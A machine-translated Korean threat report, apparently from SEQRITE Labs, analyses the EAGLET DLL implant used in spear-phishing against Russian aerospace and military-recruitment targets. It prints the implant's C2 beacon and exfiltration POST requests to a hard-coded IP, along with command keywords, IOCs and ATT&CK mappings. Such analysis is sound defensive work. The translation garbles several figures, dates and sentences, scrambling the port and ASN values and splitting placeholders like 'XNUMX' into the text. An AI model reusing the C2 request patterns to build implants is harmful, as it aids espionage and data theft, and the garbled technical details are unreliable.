목차
- 개요
- 초기 발견
- 감염 사슬.
- 기술 분석
- 0단계 – 악성 이메일 파일.
- 1단계 – 악성 LNK 파일.
- 2단계 – 미끼 파일 살펴보기.
- 3단계 – 악성 EAGLET 임플란트.
- 사냥과 인프라.
- 인프라 세부 정보.
- 비슷한 캠페인.
- 속성
- 맺음말
- SEQRITE 보호.
- IOC
- 미터 공격.
개요
SEQRITE Labs APT-Team은 최근 러시아 항공우주 산업을 표적으로 삼는 캠페인을 발견했습니다. 이 캠페인은 러시아의 주요 항공기 생산 기관 중 하나인 보로네시 항공기 생산 협회(VASO) 직원들을 표적으로 삼아 러시아 물류 운영에 필수적인 TTN(товарно-транспортная накладная) 문서를 사용하는 것을 목표로 합니다. 이 캠페인에 연루된 전체 악성코드 생태계는 악성 LNK 파일인 EAGLET DLL 임플랜트를 사용하여 악성 명령을 실행하고 데이터를 유출하는 방식을 기반으로 합니다.
이 블로그에서는 분석 과정에서 발견한 캠페인의 기술적 세부 사항을 살펴보겠습니다. 캠페인의 여러 단계를 살펴보겠습니다. 캠페인에 사용된 초기 감염 경로부터 임플란트까지 심층 분석하여 캠페인에 대한 최종 개요를 제공합니다.
초기 발견
최근 27월 XNUMX일, 저희 팀은 악성 스피어 피싱 첨부 파일을 사냥하던 중 다음과 같은 소스에서 악성 이메일 파일이 발견되었습니다. VirusTotal추가 조사를 진행한 결과, 악성 DLL 첨부 파일의 실행을 담당하는 악성 LNK 파일도 발견했는데, 이 파일의 파일 형식은 ZIP 첨부 파일로 위장되어 있었습니다.
이메일을 살펴본 결과, TRANSPORTORТная_накладная_ТТН_№391-44_от_26.06.2025.zip 파일이 발견되었습니다. 이 파일은 Transport_Consignment_Note_TTN_No.391-44_from_26.06.2025.zip으로 번역되는데, 기본적으로 DLL 파일입니다. 더 자세히 찾아보니 같은 이름의 바로가기 [LNK] 파일도 발견되었습니다. 그래서 이 파일들의 작동 방식을 조사하기로 했습니다.
감염 사슬
기술 분석
이 캠페인에 대한 분석을 세 부분으로 나누어 살펴보겠습니다. 먼저 악성 EML 파일을 살펴보고, 그 다음 첨부 파일, 악성 DLL 임플란트, LNK 파일을 살펴보겠습니다.
0단계 – 악성 이메일 파일.
음, 처음에 저희는 러시아 연방에서 업로드된 backup-message-10.2.2.20_9045-800282.eml이라는 악성 이메일 파일을 발견했습니다. 이후 해당 이메일 파일의 세부 정보를 조사했습니다.
우리는 해당 이메일이 운송 및 물류 센터의 보로네시 항공기 생산 협회(VASO) 직원에게 배송 안내서와 관련하여 전송되었음을 발견했습니다.
이메일 내용을 살펴보니 최근 물류 이동 소식을 전하기 위해 작성된 메시지였으며, 운송장(Consignment note)도 언급되어 있었습니다.Товарно-transportная накладная No391-44 от 26.06.2025), 이메일 내용은 수신자에게 2~3일 안에 특정 화물을 배송받을 준비를 하라고 촉구합니다. 공격자가 개인을 사칭한다는 사실을 이미 확인했기에, ZIP 파일로 위장한 악성 첨부 파일도 발견되었습니다. 다운로드 후, 악성 DLL 임플랜트임을 확인했습니다.
악성 DLL 임플란트와 별도로, 우리는 같은 이름의 악성 LNK 파일을 사냥했습니다. 이 파일은 다른 스피어 피싱 첨부 파일에 의해 삭제된 것으로 생각되며, 이 DLL 임플란트를 실행하는 데 사용됩니다. 이를 EAGLET이라고 명명했습니다.
다음 섹션에서는 악성 LNK 파일을 살펴보겠습니다.
1단계 – 악성 LNK 파일.
LNK 파일 내부를 살펴본 결과, 악성 DLL 파일을 실행하고 화면에 가짜 팝업을 생성하는 특정 작업을 수행하는 것으로 나타났습니다. 이 작업은 다음과 같은 방식으로 진행됩니다.
처음에는 powershell.exe 바이너리를 사용하여 백그라운드에서 스크립트를 실행하는데, 여기서는 악성 EAGLET 임플란트인 위장 ZIP 파일을 열거합니다. 그런 다음 악성 임플란트를 찾으면 rundll32.exe LOLBIN을 통해 이를 실행합니다. 찾지 못하면 %USERPROFILE%에서 재귀적으로 파일을 찾고, 찾으면 실행합니다. 그런 다음 해당 위치에서 파일을 찾지 못하면 %TEMP% 위치에서 찾아보려고 합니다.
DLL 임플랜트를 발견하면 해당 악성 프로그램이 실행되어 임플랜트 내에 내장된 디코이(decoy) XLS 파일을 추출합니다. 이는 시작 부분 59904바이트 바로 뒤에 저장된 296960바이트의 XLS 파일을 읽어서 %TEMP% 디렉터리에 ранспортная_накладная_ТТН_№391-44_от_26.06.2025.xls라는 이름으로 저장합니다. 이것이 악성 LNK 파일의 목적이며, 다음 섹션에서 디코이 파일을 살펴보겠습니다.
2단계 - 미끼 파일 살펴보기.
이 섹션에서는 DLL 임플란트에서 추출된 XLS 디코이 파일을 살펴보겠습니다.
처음에 저희는 참조된 .XLS 파일이 미국 재무부의 OFAC SDN(특별지정국가) 목록에 등재된 제재 대상 러시아 기관인 Obltransterminal LLC(ООО "Облтранстерминал")와 연관되어 있음을 확인했습니다. 해당 기관은 러시아의 군사 및 물류 인프라에 연루된 혐의로 행정명령 14024호에 따라 제재를 받았습니다.
그런 다음, XLS 파일에 컨테이너 번호, 유형, 공차 중량, 적재 용량, 봉인 번호, 그리고 차량 및 플랫폼 정보를 기록하는 구조화된 필드에 대한 세부 정보가 포함되어 있는 것을 확인했습니다. 특히, 컨테이너 상태(적재됨, 공차, 수리 중)를 확인하는 체크박스와 컨테이너의 물리적 손상을 표시하는 데 지정된 도식적 영역이 포함되어 있습니다.
그러면 우리는 미끼에 러시아 물류 작업에서 일반적으로 사용되는 컨테이너 손상 코드의 자세한 목록이 포함되어 있음을 알 수 있습니다.. 이 코드는 컨테이너 검사 중 발견될 수 있는 광범위한 구조적 및 기계적 문제를 포괄합니다. 균열 또는 구멍(Трещина), 상하부 보의 변형(Деформация верхних/нижних балок), 부식(Сквозная коррозия), 잠금 막대, 힌지, 고무 씰, 플레이트 및 모서리 피팅의 부재 또는 손상과 같은 특정 용어가 목록에 포함되어 있습니다. 각 손상 유형은 표준화된 검사 문서를 모방하여 1부터 24까지 체계적으로 번호가 매겨져 있습니다.
전반적으로 이 미끼는 기본적으로 공식 러시아 컨테이너 검사 문서를 시뮬레이션하는 것과 관련이 있습니다. 장비 교환 보고서(EIR) - 화물 컨테이너의 이전 또는 인계 시 사용됩니다. 여기에는 균열 및 변형부터 부식 및 관련 부품 누락까지 모든 것을 포괄하는 24개 손상 코드의 표준화된 목록과 함께 컨테이너 사양, 봉인 번호, 무게 및 차량 데이터에 대한 구조화된 필드가 포함됩니다. 오블트랜스터미널 LLC다음 섹션에서는 EAGLET 임플란트에 대해 살펴보겠습니다.
3단계 – 악성 EAGLET 임플란트.
처음에 임플란트를 보고 PE 분석 도구에 로드했을 때, 이것이 PE 파일이고 미끼는 오버레이 섹션 내부에 저장되어 있다는 것을 확인할 수 있었습니다. 이는 이전에 이미 확인했습니다.
다음으로, 이 악성 DLL의 내보내기를 살펴보았습니다. EntryPoint를 살펴봤지만, 안타깝게도 흥미로운 내용은 없었습니다. 다음으로 DllEntryPoint를 살펴보니 DllMain에 악성 동작과 관련된 흥미로운 코드가 포함되어 있었습니다.
흥미로운 초기 기능은 기본적으로 대상 머신의 정보를 열거하는 것입니다.
이 기능에서 코드는 대상의 고유한 GUID를 생성합니다. 이 GUID는 피해자를 식별하는 데 사용됩니다. 임플란트가 실행될 때마다 새로운 GUID가 생성됩니다. 이는 세션 ID의 동작을 모방하여 운영자나 위협 행위자가 대상에 대한 정보를 얻는 데 도움이 됩니다.
그런 다음 대상 컴퓨터의 컴퓨터 이름과 호스트 이름, DNS 도메인 이름을 나열합니다. 나열된 정보를 수신하면 ProgramData 위치에 MicrosoftApppStore라는 디렉터리를 생성합니다.
다음으로 CreateThread를 사용하여 명령 및 제어[C2] IP에 연결하는 등의 작업을 담당하는 악성 스레드를 생성합니다.
다음으로, 이 임플란트는 HTTP 세션을 시작하기 위해 WinHttpOpen과 같은 특정 Windows 네트워킹 API를 사용하고, 일반적이지 않은 사용자 에이전트 문자열인 MicrosoftAppStore/2001.0으로 위장한 다음, 포트 2을 통해 하드코딩된 명령 및 제어[C185.225.17.104] 서버인 80에 연결을 시도하는 WinHttpOpen과 같은 특정 Windows 네트워킹 API를 사용하고, 실패할 경우 계속해서 다시 시도합니다.
임플란트가 C2에 연결되면 URL 경로가 형성되고, 이 경로를 사용하여 C2 인프라에 GET 요청을 전송합니다. 전체 요청 본문은 다음과 같습니다.
GET /poll?id=<{무작위로 생성된 GUID}&hostname={hostname}&domain={domain} HTTP/1.1호스트: 185.225.17.104
요청을 보낸 후 임플란트는 다음을 시도합니다. HTTP 응답을 읽다 C2 서버에서 전송된 메시지에는 특정 명령을 수행하기 위한 지침이 포함되어 있을 수 있습니다.
기능성과 관련하여, 이 임플란트는 셸 액세스를 지원하는데, 이는 기본적으로 C2 운영자나 위협 행위자에게 대상 시스템에 셸을 제공하는데, 이를 사용하여 악의적인 활동을 수행할 수 있습니다.
이 임플란트의 또 다른 특징은 다운로드 기능입니다. 서버에서 악성 콘텐츠를 다운로드하거나 대상 컴퓨터에서 필요하거나 흥미로운 파일을 추출하는 기능입니다. 한 가지 기능은 서버에서 악성 콘텐츠를 다운로드하여 C:\ProgramData\MicrosoftAppStore\에 저장합니다. 현재 C2가 다운되어 이 연구가 발표되는 동안 사용되었거나 사용된 파일을 찾을 수 없었습니다.
나중에, 이 다운로드 기능과는 무관한 또 다른 기능도 분명해졌습니다. 이 임플란트는 기본적으로 대상 컴퓨터에서 파일을 추출하는 것이었습니다. 요청 본문은 다음과 같습니다.
POST /result HTTP/1.1Host: 185[.]225[.]17[.]104Content-Type: application/x-www-form-urlencoded id=8b9c0f52-e7d1-4d0f-b4de-fc62b4c4fa6f&hostname=VICTIM-PC&domain=CORP&result=Q29tbWFuZCByZXN1bHQgdGV4dA==
따라서 특징은 다음과 같다.
| 특색 | 트리거 키워드 | 행동 | 목적 |
| 명령 실행 | 명령: | C2 서버로부터 수신된 쉘 명령을 실행하고 출력을 캡처합니다. | 원격 코드 실행 |
| 다운로드 파일 | 다운로드 : | 원격 위치에서 파일을 다운로드하여 C:\ProgramData\MicrosoftAppStore\에 저장합니다. | 탑재체 스테이징 |
| 여과 | (자동적 인) | HTTP POST를 통해 명령 실행 결과나 다운로드 상태를 C2 서버로 전송합니다. | 데이터 유출 |
EAGLET 임플란트에 대한 기술적 분석은 여기까지입니다. 다음으로 인프라 지식과 유사한 캠페인 사냥에 초점을 맞춘 다른 부분을 살펴보겠습니다.
사냥과 인프라
인프라 세부 사항
이 섹션에서는 인프라 관련 아티팩트를 살펴보겠습니다. 처음에는 EAGLET 임플란트 연결을 담당하는 C2(185[.]225[.]17[.]104)가 발견되었습니다. 이 C2 서버는 루마니아에 있으며, MivoCloud SRL의 ASN 39798을 사용합니다.
글쎄요, 조사해보니 많은 수동 DNS 레코드가 이전에 동일한 위협 클러스터와 연관되었던 과거 인프라를 가리키고 있었고 이는 TA505에 연결되어 있었습니다. 이는 연구원들이 조사한 것입니다. 바이너리디펜스DNS 레코드는 이 캠페인에 유사하거나 재활용된 인프라가 사용되었음을 시사합니다. 또한, 재활용 도메인 사용 측면에서 TA505와 인프라가 상호 연관되어 있다는 점 외에도, 다른 의심스러운 도메인에서도 동일한 인프라를 가리키는 DNS 레코드가 발견되었습니다. 앞서 언급한 정보를 제외하면, 현재 캠페인은 TA505와 아무런 상관관계가 없음을 확신할 수 있습니다.
항공우주 분야를 표적으로 삼은 이번 캠페인과 유사하게, 러시아 군사 분야를 표적으로 삼는 또 다른 캠페인도 발견되었습니다. 이 캠페인에서 위협 행위자는 EAGLET 임플란트를 사용했는데, 이 임플란트는 C2, 즉 188[.]127[.]254[.]44에 연결됩니다. 이 C56694는 러시아어로 ASN XNUMX로 등록되어 있으며, LLC Smart Ape 조직에 속합니다.
유사한 캠페인
캠페인 1 – 군사 테마 타겟팅
처음에 우리는 URL 본문과 임플란트의 다른 많은 행동적 아티팩트를 발견했고, 이를 통해 러시아 군 입대를 표적으로 삼아 정확히 유사한 임플란트를 사용한 또 다른 캠페인을 발견했습니다.
이 미끼는 Договор_РН83_изменения.zip이라는 이름의 EAGLET 임플란트에서 추출되었으며, Contract_RN83_Changes로 번역됩니다. 이 임플란트는 러시아 군 모집과 관련된 개인 및 단체를 표적으로 삼아 왔습니다. 보시다시피, 이 미끼는 주택 담보 대출부터 연금까지 복무의 여러 가지 이점을 강조합니다.
캠페인 2 – 미끼가 내장되지 않은 EAGLET 임플란트
이전 캠페인에서 위협 엔터티가 악성 LNK를 드롭하여 DLL 임플란트를 실행하고 임플란트 오버레이 섹션 내부에 있는 미끼를 추출하는 경우가 가끔 있었지만, 이번 캠페인에서는 미끼가 없는 임플란트도 확인했습니다.
이와 함께 우리는 유사한 타겟 관심사를 가진 이러한 캠페인의 여러 중복과 Head Mare로 알려진 위협 엔터티와 임플란트 코드가 중복되는 것을 보았습니다. 이 엔터티는 연구원들이 처음 발견한 러시아어 사용 엔터티를 표적으로 삼았습니다. 카스퍼 스키.
속성
귀속(attribution)은 위협 행위자나 집단을 설명할 때 필수적인 지표입니다. 여기에는 전술, 기법, 절차(TTP), 코드 유사성 및 재사용, 위협 행위자의 동기, 그리고 유사한 파일 또는 미끼 명명법 사용과 같은 운영상의 실수 등 다양한 영역을 분석하고 상관관계를 파악하는 것이 포함됩니다.
UNG0901에 대한 지속적인 추적을 통해 카스퍼스키 연구원들이 발견한 "헤드 메어(Head Mare)"라는 위협 그룹과 주목할 만한 유사점과 중복되는 부분을 발견했습니다. 헤드 메어와 UNG0901의 주요 중복 부분을 살펴보겠습니다.
UNG0901과 Head Mare 사이의 주요 중복
- 도구 무기고:
카스퍼스키 연구원들은 Head Mare가 PhantomDL이라는 Golang 기반 백도어를 자주 사용하는 것을 발견했습니다. 이 백도어는 UPX와 같은 소프트웨어 패키저를 사용하여 패키징되는데, 셸, 다운로드, 업로드, 종료 등 매우 간단하면서도 기능적인 기능을 제공합니다. 마찬가지로 UNG0901도 EAGLET 임플란트를 배포했는데, 이 임플란트는 유사한 동작을 보이며 셸, 다운로드, 업로드 등 거의 유사한 기능을 제공하며 C++로 프로그래밍되었습니다.
- 파일 명명 기술:
카스퍼스키 연구원들은 PhantomDL 악성코드가 Contract_kh02_523과 같은 파일 이름을 사용한 스피어피싱을 통해 자주 유포된다는 것을 발견했습니다. UNG0901이 목격한 캠페인에서도 Contract_RN83_Changes와 같은 유사한 파일 이름을 사용하는 경우가 많았습니다. 이외에도 유사한 파일 명명 방식이 많이 발견되었습니다.
- 동기 부여 :
Head Mare는 러시아와 관련된 중요한 기관을 표적으로 삼았고, UNG0901도 러시아에 속한 여러 중요한 기관을 표적으로 삼았습니다.
이 외에도 두 위협 실체 간의 연관성을 강화하는 많은 추가적이고 강력한 유사점이 있습니다. 따라서 UNG0901 위협 실체는 러시아 정부 및 비정부 기관을 표적으로 삼는 Head Mare와 자원을 공유하고 다른 많은 유사점을 가지고 있다고 생각합니다.
맺음말
UNG0901 또는 Unknown-Group-901은 러시아 항공우주 및 방위 산업을 겨냥한 표적 사이버 작전을 보여줍니다. 스피어피싱 이메일과 맞춤형 EAGLET DLL을 이용하여 간첩 및 데이터 유출을 목적으로 합니다. UNG0901은 Head Mare와도 겹치며, 미끼 명칭 등 여러 면에서 유사합니다.
SEQRITE 보호
- 에이전트시알
- 트로이 목마.49644.SL
IOC
| 파일 유형 | 파일 이름 | SHA-256 |
| LNK | Договор_РН83_изменения.pdf.lnk | a9324a1fa529e5c115232cbbc60330d37cef5c20860bafc63b11e14d1e75697c |
| TRANSPORTNая_накладная_ТТН_No391-44_от_26.06.2025.xls.lnk | 4d4304d7ad1a8d0dacb300739d4dcaade299b28f8be3f171628a7358720ca6c5 | |
| DLL | Договор_РН83_изменения.zip | 204544fc8a8cac64bb07825a7bd58c54cb3e605707e2d72206ac23a1657bfe1e |
| Транспортная_накладная_ТТН_No391-44_от_26.06.2025.zip | 01f12bb3f4359fae1138a194237914f4fcdbf9e472804e428a765ad820f399be | |
| N/A | b683235791e3106971269259026e05fdc2a4008f703ff2a4d32642877e57429a | |
| Договор_РН83_изменения.zip | 413c9e2963b8cca256d3960285854614e2f2e78dba023713b3dd67af369d5d08 | |
| 미끼[XLS/ PDF] | 임시.pdf | 02098f872d00cffabb21bd2a9aa3888d994a0003d3aa1c80adcfb43023809786 |
| 샘플 추출.xls | f6baa2b5e77e940fe54628f086926d08cc83c550cd2b4b34b4aab38fd79d2a0d | |
| 80650000 | 3e93c6cd9d31e0428085e620fdba017400e534f9b549d4041a5b0baaee4f7aff | |
| 샘플 추출.xls | c3caa439c255b5ccd87a336b7e3a90697832f548305c967c0c40d2dc40e2032e | |
| 샘플 추출.xls | 44ada9c8629d69dd3cf9662c521ee251876706ca3a169ca94c5421eb89e0d652 | |
| 샘플 추출.xls | e12f7ef9df1c42bc581a5f29105268f3759abea12c76f9cb4d145a8551064204 | |
| 샘플 추출.xls | a8fdc27234b141a6bd7a6791aa9cb332654e47a57517142b3140ecf5b0683401 | |
| 이메일-파일 | 백업-메시지-10.2.2.20_9045-800282.eml | ae736c2b4886d75d5bbb86339fb034d37532c1fee2252193ea4acc4d75d8bfd7 |
MITER ATT & CK
| 술책 | 기술 | ID | 세부 정보 |
| 초기 액세스 | 스피어피싱 첨부 파일 | T1566.001 | TTN 문서 미끼를 이용해 물류 센터를 사칭한 악성 .EML 파일이 VASO 직원에게 전송되었습니다. |
| 실행 | 시스템 바이너리 프록시 실행: Rundll32 | T1218.011 | 신뢰할 수 있는 rundll32.exe LOLBIN을 통해 실행되는 DLL 임플란트는 .LNK 파일에서 호출됩니다. |
| PowerShell을 | T1059.001 | 여러 대체 디렉토리에서 DLL 임플란트를 찾아 실행하는 데 사용됩니다. | |
| 고집 | ZIP으로 위장된 DLL에 이식 | [커스텀] | DLL은 .ZIP 파일로 위장합니다. 운영자가 제어하는 실행을 통해 지속성이 내재되어 있습니다. |
| 방어 회피 | 위장 | T1036 | ZIP으로 위장된 임플란트, 승인된 물류 서류를 가장하는 데 사용되는 미끼 XLS. |
| 발견 | 시스템 정보 검색 | T1082 | 호스트 이름, 컴퓨터 이름, 도메인을 수집하고, 대상을 식별하기 위해 피해자 GUID를 생성합니다. |
| 도메인 트러스트 검색 | T1482 | 네트워크 프로파일링을 위해 피해자의 DNS 도메인을 열거합니다. | |
| 명령 및 제어 | 애플리케이션 계층 프로토콜: HTTP | T1071.001 | HTTP를 통해 C2와 통신합니다. MicrosoftAppStore/2001.0 User-Agent를 사용합니다. |
| 수집 | 로컬 시스템의 데이터 | T1005 | 위협 행위자의 명령 트리거에 따라 시스템 세부 정보와 파일 내용을 추출합니다. |
| 여과 | C2 채널을 통한 유출 | T1041 | 인코딩된 명령 결과나 유출된 데이터를 C2의 /result 엔드포인트에 POST 요청합니다. |
| 영향 | 데이터 유출 | T1537 | 러시아 항공우주 분야의 특정 대상을 표적으로 삼아 데이터를 훔쳤습니다. |
저자 :
수바지트 싱하
사트윅 람 프라키
